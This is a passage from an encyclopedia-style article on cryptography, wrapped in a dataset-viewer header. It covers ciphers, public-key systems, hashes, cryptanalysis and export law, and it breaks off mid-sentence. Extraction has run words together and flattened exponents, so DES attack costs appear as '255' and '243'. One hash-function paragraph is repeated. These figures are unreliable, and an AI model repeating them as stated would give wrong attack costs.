text
stringlengths
16
172k
source
stringlengths
32
122
Cryptography, orcryptology(fromAncient Greek:κρυπτός,romanized:kryptós"hidden, secret"; andγράφεινgraphein, "to write", or-λογία-logia, "study", respectively[1]), is the practice and study of techniques forsecure communicationin the presence ofadversarialbehavior.[2]More generally, cryptography is about constructing and analyzingprotocolsthat prevent third parties or the public from reading private messages.[3]Modern cryptography exists at the intersection of the disciplines of mathematics,computer science,information security,electrical engineering,digital signal processing, physics, and others.[4]Core concepts related toinformation security(data confidentiality,data integrity,authentication, andnon-repudiation) are also central to cryptography.[5]Practical applications of cryptography includeelectronic commerce,chip-based payment cards,digital currencies,computer passwords, andmilitary communications. Cryptography prior to the modern age was effectively synonymous withencryption, converting readable information (plaintext) to unintelligiblenonsensetext (ciphertext), which can only be read by reversing the process (decryption). The sender of an encrypted (coded) message shares the decryption (decoding) technique only with the intended recipients to preclude access from adversaries. The cryptography literatureoften uses the names"Alice" (or "A") for the sender, "Bob" (or "B") for the intended recipient, and "Eve" (or "E") for theeavesdroppingadversary.[6]Since the development ofrotor cipher machinesinWorld War Iand the advent of computers inWorld War II, cryptography methods have become increasingly complex and their applications more varied. Modern cryptography is heavily based onmathematical theoryand computer science practice; cryptographicalgorithmsare designed aroundcomputational hardness assumptions, making such algorithms hard to break in actual practice by any adversary. While it is theoretically possible to break into a well-designed system, it is infeasible in actual practice to do so. Such schemes, if well designed, are therefore termed "computationally secure". Theoretical advances (e.g., improvements ininteger factorizationalgorithms) and faster computing technology require these designs to be continually reevaluated and, if necessary, adapted.Information-theoretically secureschemes that provably cannot be broken even with unlimited computing power, such as theone-time pad, are much more difficult to use in practice than the best theoretically breakable but computationally secure schemes. The growth of cryptographic technology has raiseda number of legal issuesin theInformation Age. Cryptography's potential for use as a tool for espionage andseditionhas led many governments to classify it as a weapon and to limit or even prohibit its use and export.[7]In some jurisdictions where the use of cryptography is legal, laws permit investigators tocompel the disclosureofencryption keysfor documents relevant to an investigation.[8][9]Cryptography also plays a major role indigital rights managementandcopyright infringementdisputes with regard todigital media.[10] The first use of the term "cryptograph" (as opposed to "cryptogram") dates back to the 19th century—originating from "The Gold-Bug", a story byEdgar Allan Poe.[11][12] Until modern times, cryptography referred almost exclusively to "encryption", which is the process of converting ordinary information (calledplaintext) into an unintelligible form (calledciphertext).[13]Decryption is the reverse, in other words, moving from the unintelligible ciphertext back to plaintext. Acipher(or cypher) is a pair of algorithms that carry out the encryption and the reversing decryption. The detailed operation of a cipher is controlled both by the algorithm and, in each instance, by a "key". The key is a secret (ideally known only to the communicants), usually a string of characters (ideally short so it can be remembered by the user), which is needed to decrypt the ciphertext. In formal mathematical terms, a "cryptosystem" is the ordered list of elements of finite possible plaintexts, finite possible cyphertexts, finite possible keys, and the encryption and decryption algorithms that correspond to each key. Keys are important both formally and in actual practice, as ciphers without variable keys can be trivially broken with only the knowledge of the cipher used and are therefore useless (or even counter-productive) for most purposes. Historically, ciphers were often used directly for encryption or decryption without additional procedures such asauthenticationor integrity checks. There are two main types of cryptosystems:symmetricandasymmetric. In symmetric systems, the only ones known until the 1970s, the same secret key encrypts and decrypts a message. Data manipulation in symmetric systems is significantly faster than in asymmetric systems. Asymmetric systems use a "public key" to encrypt a message and a related "private key" to decrypt it. The advantage of asymmetric systems is that the public key can be freely published, allowing parties to establish secure communication without having a shared secret key. In practice, asymmetric systems are used to first exchange a secret key, and then secure communication proceeds via a more efficient symmetric system using that key.[14]Examples of asymmetric systems includeDiffie–Hellman key exchange, RSA (Rivest–Shamir–Adleman), ECC (Elliptic Curve Cryptography), andPost-quantum cryptography. Secure symmetric algorithms include the commonly used AES (Advanced Encryption Standard) which replaced the older DES (Data Encryption Standard).[15]Insecure symmetric algorithms include children's language tangling schemes such asPig Latinor othercant, and all historical cryptographic schemes, however seriously intended, prior to the invention of theone-time padearly in the 20th century. Incolloquialuse, the term "code" is often used to mean any method of encryption or concealment of meaning. However, in cryptography, code has a more specific meaning: the replacement of a unit of plaintext (i.e., a meaningful word or phrase) with acode word(for example, "wallaby" replaces "attack at dawn"). A cypher, in contrast, is a scheme for changing or substituting an element below such a level (a letter, a syllable, or a pair of letters, etc.) to produce a cyphertext. Cryptanalysisis the term used for the study of methods for obtaining the meaning of encrypted information without access to the key normally required to do so; i.e., it is the study of how to "crack" encryption algorithms or their implementations. Some use the terms "cryptography" and "cryptology" interchangeably in English,[16]while others (including US military practice generally) use "cryptography" to refer specifically to the use and practice of cryptographic techniques and "cryptology" to refer to the combined study of cryptography and cryptanalysis.[17][18]English is more flexible than several other languages in which "cryptology" (done by cryptologists) is always used in the second sense above.RFC2828advises thatsteganographyis sometimes included in cryptology.[19] The study of characteristics of languages that have some application in cryptography or cryptology (e.g. frequency data, letter combinations, universal patterns, etc.) is calledcryptolinguistics. Cryptolingusitics is especially used in military intelligence applications for deciphering foreign communications.[20][21] Before the modern era, cryptography focused on message confidentiality (i.e., encryption)—conversion ofmessagesfrom a comprehensible form into an incomprehensible one and back again at the other end, rendering it unreadable by interceptors oreavesdropperswithout secret knowledge (namely the key needed for decryption of that message). Encryption attempted to ensuresecrecyin communications, such as those ofspies, military leaders, and diplomats. In recent decades, the field has expanded beyond confidentiality concerns to include techniques for message integrity checking, sender/receiver identity authentication,digital signatures,interactive proofsandsecure computation, among others. The main classical cipher types aretransposition ciphers, which rearrange the order of letters in a message (e.g., 'hello world' becomes 'ehlol owrdl' in a trivially simple rearrangement scheme), andsubstitution ciphers, which systematically replace letters or groups of letters with other letters or groups of letters (e.g., 'fly at once' becomes 'gmz bu podf' by replacing each letter with the one following it in theLatin alphabet).[22]Simple versions of either have never offered much confidentiality from enterprising opponents. An early substitution cipher was theCaesar cipher, in which each letter in the plaintext was replaced by a letter three positions further down the alphabet.[23]Suetoniusreports thatJulius Caesarused it with a shift of three to communicate with his generals.Atbashis an example of an early Hebrew cipher. The earliest known use of cryptography is some carved ciphertext on stone inEgypt(c.1900 BCE), but this may have been done for the amusement of literate observers rather than as a way of concealing information. TheGreeks of Classical timesare said to have known of ciphers (e.g., thescytaletransposition cipher claimed to have been used by theSpartanmilitary).[24]Steganography(i.e., hiding even the existence of a message so as to keep it confidential) was also first developed in ancient times. An early example, fromHerodotus, was a message tattooed on a slave's shaved head and concealed under the regrown hair.[13]Other steganography methods involve 'hiding in plain sight,' such as using amusic cipherto disguise an encrypted message within a regular piece of sheet music. More modern examples of steganography include the use ofinvisible ink,microdots, anddigital watermarksto conceal information. In India, the 2000-year-oldKama SutraofVātsyāyanaspeaks of two different kinds of ciphers called Kautiliyam and Mulavediya. In the Kautiliyam, the cipher letter substitutions are based on phonetic relations, such as vowels becoming consonants. In the Mulavediya, the cipher alphabet consists of pairing letters and using the reciprocal ones.[13] InSassanid Persia, there were two secret scripts, according to the Muslim authorIbn al-Nadim: thešāh-dabīrīya(literally "King's script") which was used for official correspondence, and therāz-saharīyawhich was used to communicate secret messages with other countries.[25] David Kahnnotes inThe Codebreakersthat modern cryptology originated among theArabs, the first people to systematically document cryptanalytic methods.[26]Al-Khalil(717–786) wrote theBook of Cryptographic Messages, which contains the first use ofpermutations and combinationsto list all possible Arabic words with and without vowels.[27] Ciphertexts produced by aclassical cipher(and some modern ciphers) will reveal statistical information about the plaintext, and that information can often be used to break the cipher. After the discovery offrequency analysis, nearly all such ciphers could be broken by an informed attacker.[28]Such classical ciphers still enjoy popularity today, though mostly aspuzzles(seecryptogram). TheArab mathematicianandpolymathAl-Kindi wrote a book on cryptography entitledRisalah fi Istikhraj al-Mu'amma(Manuscript for the Deciphering Cryptographic Messages), which described the first known use of frequency analysis cryptanalysis techniques.[29][30] Language letter frequencies may offer little help for some extended historical encryption techniques such ashomophonic cipherthat tend to flatten the frequency distribution. For those ciphers, language letter group (or n-gram) frequencies may provide an attack. Essentially all ciphers remained vulnerable to cryptanalysis using the frequency analysis technique until the development of thepolyalphabetic cipher, most clearly byLeon Battista Albertiaround the year 1467, though there is some indication that it was already known to Al-Kindi.[30]Alberti's innovation was to use different ciphers (i.e., substitution alphabets) for various parts of a message (perhaps for each successive plaintext letter at the limit). He also invented what was probably the first automaticcipher device, a wheel that implemented a partial realization of his invention. In theVigenère cipher, apolyalphabetic cipher, encryption uses akey word, which controls letter substitution depending on which letter of the key word is used. In the mid-19th centuryCharles Babbageshowed that the Vigenère cipher was vulnerable toKasiski examination, but this was first published about ten years later byFriedrich Kasiski.[31] Although frequency analysis can be a powerful and general technique against many ciphers, encryption has still often been effective in practice, as many a would-be cryptanalyst was unaware of the technique. Breaking a message without using frequency analysis essentially required knowledge of the cipher used and perhaps of the key involved, thus making espionage, bribery, burglary, defection, etc., more attractive approaches to the cryptanalytically uninformed. It was finally explicitly recognized in the 19th century that secrecy of a cipher's algorithm is not a sensible nor practical safeguard of message security; in fact, it was further realized that any adequate cryptographic scheme (including ciphers) should remain secure even if the adversary fully understands the cipher algorithm itself. Security of the key used should alone be sufficient for a good cipher to maintain confidentiality under an attack. This fundamental principle was first explicitly stated in 1883 byAuguste Kerckhoffsand is generally calledKerckhoffs's Principle; alternatively and more bluntly, it was restated byClaude Shannon, the inventor ofinformation theoryand the fundamentals of theoretical cryptography, asShannon's Maxim—'the enemy knows the system'. Different physical devices and aids have been used to assist with ciphers. One of the earliest may have been the scytale of ancient Greece, a rod supposedly used by the Spartans as an aid for a transposition cipher. In medieval times, other aids were invented such as thecipher grille, which was also used for a kind of steganography. With the invention of polyalphabetic ciphers came more sophisticated aids such as Alberti's owncipher disk,Johannes Trithemius'tabula rectascheme, andThomas Jefferson'swheel cypher(not publicly known, and reinvented independently byBazeriesaround 1900). Many mechanical encryption/decryption devices were invented early in the 20th century, and several patented, among themrotor machines—famously including theEnigma machineused by the German government and military from the late 1920s and duringWorld War II.[32]The ciphers implemented by better quality examples of these machine designs brought about a substantial increase in cryptanalytic difficulty after WWI.[33] Cryptanalysis of the new mechanical ciphering devices proved to be both difficult and laborious. In the United Kingdom, cryptanalytic efforts atBletchley Parkduring WWII spurred the development of more efficient means for carrying out repetitive tasks, suchas military code breaking (decryption). This culminated in the development of theColossus, the world's first fully electronic, digital,programmablecomputer, which assisted in the decryption of ciphers generated by the German Army'sLorenz SZ40/42machine. Extensive open academic research into cryptography is relatively recent, beginning in the mid-1970s. In the early 1970sIBMpersonnel designed the Data Encryption Standard (DES) algorithm that became the first federal government cryptography standard in the United States.[34]In 1976Whitfield DiffieandMartin Hellmanpublished the Diffie–Hellman key exchange algorithm.[35]In 1977 theRSA algorithmwas published inMartin Gardner'sScientific Americancolumn.[36]Since then, cryptography has become a widely used tool in communications,computer networks, andcomputer securitygenerally. Some modern cryptographic techniques can only keep their keys secret if certain mathematical problems areintractable, such as theinteger factorizationor thediscrete logarithmproblems, so there are deep connections withabstract mathematics. There are very few cryptosystems that are proven to be unconditionally secure. Theone-time padis one, and was proven to be so by Claude Shannon. There are a few important algorithms that have been proven secure under certain assumptions. For example, the infeasibility of factoring extremely large integers is the basis for believing that RSA is secure, and some other systems, but even so, proof of unbreakability is unavailable since the underlying mathematical problem remains open. In practice, these are widely used, and are believed unbreakable in practice by most competent observers. There are systems similar to RSA, such as one byMichael O. Rabinthat are provably secure provided factoringn = pqis impossible; it is quite unusable in practice. Thediscrete logarithm problemis the basis for believing some other cryptosystems are secure, and again, there are related, less practical systems that are provably secure relative to the solvability or insolvability discrete log problem.[37] As well as being aware of cryptographic history,cryptographic algorithmand system designers must also sensibly consider probable future developments while working on their designs. For instance, continuous improvements in computer processing power have increased the scope ofbrute-force attacks, so when specifyingkey lengths, the required key lengths are similarly advancing.[38]The potential impact ofquantum computingare already being considered by some cryptographic system designers developing post-quantum cryptography.[when?]The announced imminence of small implementations of these machines may be making the need for preemptive caution rather more than merely speculative.[5] Claude Shannon's two papers, his1948 paperoninformation theory, and especially his1949 paperon cryptography, laid the foundations of modern cryptography and provided a mathematical basis for future cryptography.[39][40]His 1949 paper has been noted as having provided a "solid theoretical basis for cryptography and for cryptanalysis",[41]and as having turned cryptography from an "art to a science".[42]As a result of his contributions and work, he has been described as the "founding father of modern cryptography".[43] Prior to the early 20th century, cryptography was mainly concerned withlinguisticandlexicographicpatterns. Since then cryptography has broadened in scope, and now makes extensive use of mathematical subdisciplines, including information theory,computational complexity, statistics,combinatorics,abstract algebra,number theory, andfinite mathematics.[44]Cryptography is also a branch of engineering, but an unusual one since it deals with active, intelligent, and malevolent opposition; other kinds of engineering (e.g., civil or chemical engineering) need deal only with neutral natural forces. There is also active research examining the relationship between cryptographic problems andquantum physics. Just as the development of digital computers and electronics helped in cryptanalysis, it made possible much more complex ciphers. Furthermore, computers allowed for the encryption of any kind of data representable in any binary format, unlike classical ciphers which only encrypted written language texts; this was new and significant. Computer use has thus supplanted linguistic cryptography, both for cipher design and cryptanalysis. Many computer ciphers can be characterized by their operation onbinarybitsequences (sometimes in groups or blocks), unlike classical and mechanical schemes, which generally manipulate traditional characters (i.e., letters and digits) directly. However, computers have also assisted cryptanalysis, which has compensated to some extent for increased cipher complexity. Nonetheless, good modern ciphers have stayed ahead of cryptanalysis; it is typically the case that use of a quality cipher is very efficient (i.e., fast and requiring few resources, such as memory or CPU capability), while breaking it requires an effort many orders of magnitude larger, and vastly larger than that required for any classical cipher, making cryptanalysis so inefficient and impractical as to be effectively impossible. Symmetric-key cryptography refers to encryption methods in which both the sender and receiver share the same key (or, less commonly, in which their keys are different, but related in an easily computable way). This was the only kind of encryption publicly known until June 1976.[35] Symmetric key ciphers are implemented as eitherblock ciphersorstream ciphers. A block cipher enciphers input in blocks of plaintext as opposed to individual characters, the input form used by a stream cipher. TheData Encryption Standard(DES) and theAdvanced Encryption Standard(AES) are block cipher designs that have been designatedcryptography standardsby the US government (though DES's designation was finally withdrawn after the AES was adopted).[45]Despite its deprecation as an official standard, DES (especially its still-approved and much more securetriple-DESvariant) remains quite popular; it is used across a wide range of applications, from ATM encryption[46]toe-mail privacy[47]andsecure remote access.[48]Many other block ciphers have been designed and released, with considerable variation in quality. Many, even some designed by capable practitioners, have been thoroughly broken, such asFEAL.[5][49] Stream ciphers, in contrast to the 'block' type, create an arbitrarily long stream of key material, which is combined with the plaintext bit-by-bit or character-by-character, somewhat like theone-time pad. In a stream cipher, the output stream is created based on a hidden internal state that changes as the cipher operates. That internal state is initially set up using the secret key material.RC4is a widely used stream cipher.[5]Block ciphers can be used as stream ciphers by generating blocks of a keystream (in place of aPseudorandom number generator) and applying anXORoperation to each bit of the plaintext with each bit of the keystream.[50] Message authentication codes(MACs) are much likecryptographic hash functions, except that a secret key can be used to authenticate the hash value upon receipt;[5][51]this additional complication blocks an attack scheme against baredigest algorithms, and so has been thought worth the effort. Cryptographic hash functions are a third type of cryptographic algorithm. They take a message of any length as input, and output a short, fixed-lengthhash, which can be used in (for example) a digital signature. For good hash functions, an attacker cannot find two messages that produce the same hash.MD4is a long-used hash function that is now broken;MD5, a strengthened variant of MD4, is also widely used but broken in practice. The USNational Security Agencydeveloped the Secure Hash Algorithm series of MD5-like hash functions: SHA-0 was a flawed algorithm that the agency withdrew;SHA-1is widely deployed and more secure than MD5, but cryptanalysts have identified attacks against it; theSHA-2family improves on SHA-1, but is vulnerable to clashes as of 2011; and the US standards authority thought it "prudent" from a security perspective to develop a new standard to "significantly improve the robustness ofNIST's overall hash algorithm toolkit."[52]Thus, ahash function design competitionwas meant to select a new U.S. national standard, to be calledSHA-3, by 2012. The competition ended on October 2, 2012, when the NIST announced thatKeccakwould be the new SHA-3 hash algorithm.[53]Unlike block and stream ciphers that are invertible, cryptographic hash functions produce a hashed output that cannot be used to retrieve the original input data. Cryptographic hash functions are used to verify the authenticity of data retrieved from an untrusted source or to add a layer of security. Symmetric-key cryptosystems use the same key for encryption and decryption of a message, although a message or group of messages can have a different key than others. A significant disadvantage of symmetric ciphers is thekey managementnecessary to use them securely. Each distinct pair of communicating parties must, ideally, share a different key, and perhaps for each ciphertext exchanged as well. The number of keys required increases as thesquareof the number of network members, which very quickly requires complex key management schemes to keep them all consistent and secret. In a groundbreaking 1976 paper, Whitfield Diffie and Martin Hellman proposed the notion ofpublic-key(also, more generally, calledasymmetric key) cryptography in which two different but mathematically related keys are used—apublickey and aprivatekey.[54]A public key system is so constructed that calculation of one key (the 'private key') is computationally infeasible from the other (the 'public key'), even though they are necessarily related. Instead, both keys are generated secretly, as an interrelated pair.[55]The historianDavid Kahndescribed public-key cryptography as "the most revolutionary new concept in the field since polyalphabetic substitution emerged in the Renaissance".[56] In public-key cryptosystems, the public key may be freely distributed, while its paired private key must remain secret. In a public-key encryption system, thepublic keyis used for encryption, while theprivateorsecret keyis used for decryption. While Diffie and Hellman could not find such a system, they showed that public-key cryptography was indeed possible by presenting theDiffie–Hellman key exchangeprotocol, a solution that is now widely used in secure communications to allow two parties to secretly agree on ashared encryption key.[35]TheX.509standard defines the most commonly used format forpublic key certificates.[57] Diffie and Hellman's publication sparked widespread academic efforts in finding a practical public-key encryption system. This race was finally won in 1978 byRonald Rivest,Adi Shamir, andLen Adleman, whose solution has since become known as theRSA algorithm.[58] TheDiffie–HellmanandRSA algorithms, in addition to being the first publicly known examples of high-quality public-key algorithms, have been among the most widely used. Otherasymmetric-key algorithmsinclude theCramer–Shoup cryptosystem,ElGamal encryption, and variouselliptic curve techniques. A document published in 1997 by the Government Communications Headquarters (GCHQ), a British intelligence organization, revealed that cryptographers at GCHQ had anticipated several academic developments.[59]Reportedly, around 1970,James H. Ellishad conceived the principles of asymmetric key cryptography. In 1973,Clifford Cocksinvented a solution that was very similar in design rationale to RSA.[59][60]In 1974,Malcolm J. Williamsonis claimed to have developed the Diffie–Hellman key exchange.[61] Public-key cryptography is also used for implementingdigital signatureschemes. A digital signature is reminiscent of an ordinary signature; they both have the characteristic of being easy for a user to produce, but difficult for anyone else toforge. Digital signatures can also be permanently tied to the content of the message being signed; they cannot then be 'moved' from one document to another, for any attempt will be detectable. In digital signature schemes, there are two algorithms: one forsigning, in which a secret key is used to process the message (or a hash of the message, or both), and one forverification, in which the matching public key is used with the message to check the validity of the signature. RSA andDSAare two of the most popular digital signature schemes. Digital signatures are central to the operation ofpublic key infrastructuresand many network security schemes (e.g.,SSL/TLS, manyVPNs, etc.).[49] Public-key algorithms are most often based on thecomputational complexityof "hard" problems, often fromnumber theory. For example, the hardness of RSA is related to theinteger factorizationproblem, while Diffie–Hellman and DSA are related to thediscrete logarithmproblem. The security ofelliptic curve cryptographyis based on number theoretic problems involvingelliptic curves. Because of the difficulty of the underlying problems, most public-key algorithms involve operations such asmodularmultiplication and exponentiation, which are much more computationally expensive than the techniques used in most block ciphers, especially with typical key sizes. As a result, public-key cryptosystems are commonlyhybrid cryptosystems, in which a fast high-quality symmetric-key encryption algorithm is used for the message itself, while the relevant symmetric key is sent with the message, but encrypted using a public-key algorithm. Similarly, hybrid signature schemes are often used, in which a cryptographic hash function is computed, and only the resulting hash is digitally signed.[5] Cryptographic hash functions are functions that take a variable-length input and return a fixed-length output, which can be used in, for example, a digital signature. For a hash function to be secure, it must be difficult to compute two inputs that hash to the same value (collision resistance) and to compute an input that hashes to a given output (preimage resistance).MD4is a long-used hash function that is now broken;MD5, a strengthened variant of MD4, is also widely used but broken in practice. The USNational Security Agencydeveloped the Secure Hash Algorithm series of MD5-like hash functions: SHA-0 was a flawed algorithm that the agency withdrew;SHA-1is widely deployed and more secure than MD5, but cryptanalysts have identified attacks against it; theSHA-2family improves on SHA-1, but is vulnerable to clashes as of 2011; and the US standards authority thought it "prudent" from a security perspective to develop a new standard to "significantly improve the robustness ofNIST's overall hash algorithm toolkit."[52]Thus, ahash function design competitionwas meant to select a new U.S. national standard, to be calledSHA-3, by 2012. The competition ended on October 2, 2012, when the NIST announced thatKeccakwould be the new SHA-3 hash algorithm.[53]Unlike block and stream ciphers that are invertible, cryptographic hash functions produce a hashed output that cannot be used to retrieve the original input data. Cryptographic hash functions are used to verify the authenticity of data retrieved from an untrusted source or to add a layer of security. The goal of cryptanalysis is to find some weakness or insecurity in a cryptographic scheme, thus permitting its subversion or evasion. It is a common misconception that every encryption method can be broken. In connection with his WWII work atBell Labs,Claude Shannonproved that theone-time padcipher is unbreakable, provided the key material is trulyrandom, never reused, kept secret from all possible attackers, and of equal or greater length than the message.[62]Mostciphers, apart from the one-time pad, can be broken with enough computational effort bybrute force attack, but the amount of effort needed may beexponentiallydependent on the key size, as compared to the effort needed to make use of the cipher. In such cases, effective security could be achieved if it is proven that the effort required (i.e., "work factor", in Shannon's terms) is beyond the ability of any adversary. This means it must be shown that no efficient method (as opposed to the time-consuming brute force method) can be found to break the cipher. Since no such proof has been found to date, the one-time-pad remains the only theoretically unbreakable cipher. Although well-implemented one-time-pad encryption cannot be broken, traffic analysis is still possible. There are a wide variety of cryptanalytic attacks, and they can be classified in any of several ways. A common distinction turns on what Eve (an attacker) knows and what capabilities are available. In aciphertext-only attack, Eve has access only to the ciphertext (good modern cryptosystems are usually effectively immune to ciphertext-only attacks). In aknown-plaintext attack, Eve has access to a ciphertext and its corresponding plaintext (or to many such pairs). In achosen-plaintext attack, Eve may choose a plaintext and learn its corresponding ciphertext (perhaps many times); an example isgardening, used by the British during WWII. In achosen-ciphertext attack, Eve may be able tochooseciphertexts and learn their corresponding plaintexts.[5]Finally in aman-in-the-middleattack Eve gets in between Alice (the sender) and Bob (the recipient), accesses and modifies the traffic and then forward it to the recipient.[63]Also important, often overwhelmingly so, are mistakes (generally in the design or use of one of theprotocolsinvolved). Cryptanalysis of symmetric-key ciphers typically involves looking for attacks against the block ciphers or stream ciphers that are more efficient than any attack that could be against a perfect cipher. For example, a simple brute force attack against DES requires one known plaintext and 255decryptions, trying approximately half of the possible keys, to reach a point at which chances are better than even that the key sought will have been found. But this may not be enough assurance; alinear cryptanalysisattack against DES requires 243known plaintexts (with their corresponding ciphertexts) and approximately 243DES operations.[64]This is a considerable improvement over brute force attacks. Public-key algorithms are based on the computational difficulty of various problems. The most famous of these are the difficulty ofinteger factorizationofsemiprimesand the difficulty of calculatingdiscrete logarithms, both of which are not yet proven to be solvable inpolynomial time(P) using only a classicalTuring-completecomputer. Much public-key cryptanalysis concerns designing algorithms inPthat can solve these problems, or using other technologies, such asquantum computers. For instance, the best-known algorithms for solving theelliptic curve-basedversion of discrete logarithm are much more time-consuming than the best-known algorithms for factoring, at least for problems of more or less equivalent size. Thus, to achieve an equivalent strength of encryption, techniques that depend upon the difficulty of factoring large composite numbers, such as the RSA cryptosystem, require larger keys than elliptic curve techniques. For this reason, public-key cryptosystems based on elliptic curves have become popular since their invention in the mid-1990s. While pure cryptanalysis uses weaknesses in the algorithms themselves, other attacks on cryptosystems are based on actual use of the algorithms in real devices, and are calledside-channel attacks. If a cryptanalyst has access to, for example, the amount of time the device took to encrypt a number of plaintexts or report an error in a password or PIN character, they may be able to use atiming attackto break a cipher that is otherwise resistant to analysis. An attacker might also study the pattern and length of messages to derive valuable information; this is known astraffic analysis[65]and can be quite useful to an alert adversary. Poor administration of a cryptosystem, such as permitting too short keys, will make any system vulnerable, regardless of other virtues.Social engineeringand other attacks against humans (e.g., bribery,extortion,blackmail, espionage,rubber-hose cryptanalysisor torture) are usually employed due to being more cost-effective and feasible to perform in a reasonable amount of time compared to pure cryptanalysis by a high margin. Much of the theoretical work in cryptography concernscryptographicprimitives—algorithms with basic cryptographic properties—and their relationship to other cryptographic problems. More complicated cryptographic tools are then built from these basic primitives. These primitives provide fundamental properties, which are used to develop more complex tools calledcryptosystemsorcryptographic protocols, which guarantee one or more high-level security properties. Note, however, that the distinction between cryptographicprimitivesand cryptosystems, is quite arbitrary; for example, the RSA algorithm is sometimes considered a cryptosystem, and sometimes a primitive. Typical examples of cryptographic primitives includepseudorandom functions,one-way functions, etc. One or more cryptographic primitives are often used to develop a more complex algorithm, called a cryptographic system, orcryptosystem. Cryptosystems (e.g.,El-Gamal encryption) are designed to provide particular functionality (e.g., public key encryption) while guaranteeing certain security properties (e.g.,chosen-plaintext attack (CPA)security in therandom oracle model). Cryptosystems use the properties of the underlying cryptographic primitives to support the system's security properties. As the distinction between primitives and cryptosystems is somewhat arbitrary, a sophisticated cryptosystem can be derived from a combination of several more primitive cryptosystems. In many cases, the cryptosystem's structure involves back and forth communication among two or more parties in space (e.g., between the sender of a secure message and its receiver) or across time (e.g., cryptographically protectedbackupdata). Such cryptosystems are sometimes calledcryptographic protocols. Some widely known cryptosystems include RSA,Schnorr signature,ElGamal encryption, andPretty Good Privacy(PGP). More complex cryptosystems includeelectronic cash[66]systems,signcryptionsystems, etc. Some more 'theoretical'[clarification needed]cryptosystems includeinteractive proof systems,[67](likezero-knowledge proofs)[68]and systems forsecret sharing.[69][70] Lightweight cryptography (LWC) concerns cryptographic algorithms developed for a strictly constrained environment. The growth ofInternet of Things (IoT)has spiked research into the development of lightweight algorithms that are better suited for the environment. An IoT environment requires strict constraints on power consumption, processing power, and security.[71]Algorithms such as PRESENT,AES, andSPECKare examples of the many LWC algorithms that have been developed to achieve the standard set by theNational Institute of Standards and Technology.[72] Cryptography is widely used on the internet to help protect user-data and prevent eavesdropping. To ensure secrecy during transmission, many systems use private key cryptography to protect transmitted information. With public-key systems, one can maintain secrecy without a master key or a large number of keys.[73]But, some algorithms likeBitLockerandVeraCryptare generally not private-public key cryptography. For example, Veracrypt uses a password hash to generate the single private key. However, it can be configured to run in public-private key systems. TheC++opensource encryption libraryOpenSSLprovidesfree and opensourceencryption software and tools. The most commonly used encryption cipher suit isAES,[74]as it has hardware acceleration for allx86based processors that hasAES-NI. A close contender isChaCha20-Poly1305, which is astream cipher, however it is commonly used for mobile devices as they areARMbased which does not feature AES-NI instruction set extension. Cryptography can be used to secure communications by encrypting them. Websites use encryption viaHTTPS.[75]"End-to-end" encryption, where only sender and receiver can read messages, is implemented for email inPretty Good Privacyand for secure messaging in general inWhatsApp,SignalandTelegram.[75] Operating systems use encryption to keep passwords secret, conceal parts of the system, and ensure that software updates are truly from the system maker.[75]Instead of storing plaintext passwords, computer systems store hashes thereof; then, when a user logs in, the system passes the given password through a cryptographic hash function and compares it to the hashed value on file. In this manner, neither the system nor an attacker has at any point access to the password in plaintext.[75] Encryption is sometimes used to encrypt one's entire drive. For example,University College Londonhas implementedBitLocker(a program by Microsoft) to render drive data opaque without users logging in.[75] Cryptographic techniques enablecryptocurrencytechnologies, such asdistributed ledger technologies(e.g.,blockchains), which financecryptoeconomicsapplications such asdecentralized finance (DeFi). Key cryptographic techniques that enable cryptocurrencies and cryptoeconomics include, but are not limited to:cryptographic keys, cryptographic hash function,asymmetric (public key) encryption,Multi-Factor Authentication (MFA),End-to-End Encryption (E2EE), andZero Knowledge Proofs (ZKP). Cryptography has long been of interest to intelligence gathering andlaw enforcement agencies.[9]Secret communications may be criminal or eventreasonous.[citation needed]Because of its facilitation ofprivacy, and the diminution of privacy attendant on its prohibition, cryptography is also of considerable interest to civil rights supporters. Accordingly, there has been a history of controversial legal issues surrounding cryptography, especially since the advent of inexpensive computers has made widespread access to high-quality cryptography possible. In some countries, even the domestic use of cryptography is, or has been, restricted. Until 1999, France significantly restricted the use of cryptography domestically, though it has since relaxed many of these rules. InChinaandIran, a license is still required to use cryptography.[7]Many countries have tight restrictions on the use of cryptography. Among the more restrictive are laws inBelarus,Kazakhstan,Mongolia,Pakistan, Singapore,Tunisia, andVietnam.[76] In the United States, cryptography is legal for domestic use, but there has been much conflict over legal issues related to cryptography.[9]One particularly important issue has been theexport of cryptographyand cryptographic software and hardware. Probably because of the importance of cryptanalysis inWorld War IIand an expectation that cryptography would continue to be important for national security, many Western governments have, at some point, strictly regulated export of cryptography. After World War II, it was illegal in the US to sell or distribute encryption technology overseas; in fact, encryption was designated as auxiliary military equipment and put on theUnited States Munitions List.[77]Until the development of the personal computer, asymmetric key algorithms (i.e., public key techniques), and the Internet, this was not especially problematic. However, as the Internet grew and computers became more widely available, high-quality encryption techniques became well known around the globe. In the 1990s, there were several challenges to US export regulation of cryptography. After thesource codeforPhilip Zimmermann'sPretty Good Privacy(PGP) encryption program found its way onto the Internet in June 1991, a complaint byRSA Security(then called RSA Data Security, Inc.) resulted in a lengthy criminal investigation of Zimmermann by the US Customs Service and theFBI, though no charges were ever filed.[78][79]Daniel J. Bernstein, then a graduate student atUC Berkeley, brought a lawsuit against the US government challenging some aspects of the restrictions based onfree speechgrounds. The 1995 caseBernstein v. United Statesultimately resulted in a 1999 decision that printed source code for cryptographic algorithms and systems was protected asfree speechby the United States Constitution.[80] In 1996, thirty-nine countries signed theWassenaar Arrangement, an arms control treaty that deals with the export of arms and "dual-use" technologies such as cryptography. The treaty stipulated that the use of cryptography with short key-lengths (56-bit for symmetric encryption, 512-bit for RSA) would no longer be export-controlled.[81]Cryptography exports from the US became less strictly regulated as a consequence of a major relaxation in 2000;[82]there are no longer very many restrictions on key sizes in US-exportedmass-market software. Since this relaxation in US export restrictions, and because most personal computers connected to the Internet include US-sourcedweb browserssuch asFirefoxorInternet Explorer, almost every Internet user worldwide has potential access to quality cryptography via their browsers (e.g., viaTransport Layer Security). TheMozilla ThunderbirdandMicrosoft OutlookE-mail clientprograms similarly can transmit and receive emails via TLS, and can send and receive email encrypted withS/MIME. Many Internet users do not realize that their basic application software contains such extensivecryptosystems. These browsers and email programs are so ubiquitous that even governments whose intent is to regulate civilian use of cryptography generally do not find it practical to do much to control distribution or use of cryptography of this quality, so even when such laws are in force, actual enforcement is often effectively impossible.[citation needed] Another contentious issue connected to cryptography in the United States is the influence of theNational Security Agencyon cipher development and policy.[9]The NSA was involved with the design ofDESduring its development atIBMand its consideration by theNational Bureau of Standardsas a possible Federal Standard for cryptography.[83]DES was designed to be resistant todifferential cryptanalysis,[84]a powerful and general cryptanalytic technique known to the NSA and IBM, that became publicly known only when it was rediscovered in the late 